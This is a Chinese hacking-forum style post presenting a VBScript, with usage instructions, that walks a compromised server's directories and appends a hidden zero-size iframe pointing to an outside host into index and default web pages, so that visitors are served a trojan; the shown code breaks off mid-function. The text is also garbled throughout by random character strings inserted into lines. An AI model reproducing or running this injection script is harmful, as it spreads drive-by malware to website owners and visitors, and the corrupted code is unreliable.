VBS也能批量挂马!
好不容易才得到一台肉鸡,在保住肉鸡的同时还不免要扩大自己的成果。挂马其实是一个不错的选择,还有很多比我们菜的菜鸟还不懂打补丁呢(嘻嘻……)!前天下载了个批量挂马程序看了下200多K,想放在肉鸡上测试一下,好不容易才上传到肉鸡上不知怎么,运行的时候弹出个错误窗口肉鸡就挂了(真是悲哀………)!于是就想自己用脚本写个,个子小又有安全感!(Socket:下次进一个网站估计要中几十次木马了。)T0npsFZ主要功能:遍历目录,寻找符合条件的文件把马写进去。
下面的是代码,只要把代码copy到文件里另存为scan.vbe在cmd下运行。%?C["q,J[j*w2t
cscript scan.vbe 要挂马的目录Q{IH z)O
例:cscript scan.vbe D:\
'版权信息-U%TpaZv7z)i
br="************************************" & vbCrLf
br=br & "* VBS 批量挂马脚本 *" & vbCrLf|,D[{d;w#@Q#R
br=br & "* BY BanLG *" & vbCrLf
br=br & "************************************" & vbCrLf & vbCrLf
br=br & "cscript scan.vbe D:\" & vbCrLf
"HeQ-mpzw
'马的地址
ma="</Script><IfRAME height=0 width=0 sRc=" & chr(34) & "http://www.hacker.com.cn" & chr(34) & "></IFrAME>"3zD Y2}YN F@]
'要挂马的页面如果嫌不够还可以自己再加,记得要用”|”隔开e8^Jv^-\h@h
MyString="index.asp|index.html|index.htm|default.asp|default.html|default.htm"
'以"|"为分隔符拆分成数组
MyArray = Split(MyString, "|", -1, 1)
]QM$vE ] aU.z ?
web=WScript.Arguments(0)T^pX&Q
4E9|6JU1a9Q;J
'如果web为空退出脚本.FTxe9tqD
if web="" then4[\R zn+t
Wscript.echo (br)xQ2^9R]:ia
window.Close
end if9G.V&VWR?`!o2`
/O+o}li6JF
Wscript.echo (br) & "马的地址:" & ma & vbCrLf & vbCrLf
'创建对象6wl"s"]:^G
Set fso = createObject("Scripting.FileSystemObject")
}4q Vw:Jtsu
'开始扫描挂马H(N8[wY+n!LpBx9['W"a
scan(web)
?n-]vx*Q-Y[
'scan定义函数,扫描查找符合条件的文件把马的内容写到文件的结尾 r T{eeSxVy
sub scan(filesder)
set filesder=fso.getfolder(filesder)
'得到当前目录的所有文件集合2_"~5\P\7k0p
set files=filesder.files